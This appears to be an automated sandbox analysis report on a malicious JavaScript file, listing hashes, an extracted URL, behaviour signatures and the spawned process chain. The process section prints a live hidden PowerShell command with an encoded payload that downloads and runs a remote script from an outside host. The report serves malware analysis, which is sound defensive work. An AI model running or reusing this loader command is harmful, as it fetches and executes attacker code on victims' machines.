Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
20/04/2024, 22:58
Static task
static1
Behavioral task
behavioral1
Sample
fdd9062f80ec1f6e5a549d896d649ef9_JaffaCakes118.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
fdd9062f80ec1f6e5a549d896d649ef9_JaffaCakes118.js
Resource
win10v2004-20240412-en
General
-
Target
fdd9062f80ec1f6e5a549d896d649ef9_JaffaCakes118.js
-
Size
95KB
-
MD5
fdd9062f80ec1f6e5a549d896d649ef9
-
SHA1
7125adfe90d0a1b90551ecf42c258b634e1e5069
-
SHA256
4e175e9c67d6b401419c7d8c425b66a395936f888294f247b331901dfcf0108d
-
SHA512
ef95f2bb8c327e19b8431c649ac62dd4dabfaf97bd4a82f9bbfdf3b0387d0f9f74dc9f34c736e4f932d1f7386909343513137d2df05649b7193126ec869ac52d
-
SSDEEP
1536:Gp8zc14E9Ry98guHVBqqg2bcruayUHmLKeZaMU7GwbWBPwVGWl9SZ8kV8Gp/5bzy:08zcGE9Ry98guHVBqqg2bcruzUHmLKea
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2600 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2600 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2324 wrote to memory of 2552 2324 wscript.exe 28 PID 2324 wrote to memory of 2552 2324 wscript.exe 28 PID 2324 wrote to memory of 2552 2324 wscript.exe 28 PID 2552 wrote to memory of 2600 2552 cmd.exe 30 PID 2552 wrote to memory of 2600 2552 cmd.exe 30 PID 2552 wrote to memory of 2600 2552 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\fdd9062f80ec1f6e5a549d896d649ef9_JaffaCakes118.js1⤵
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:2552 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-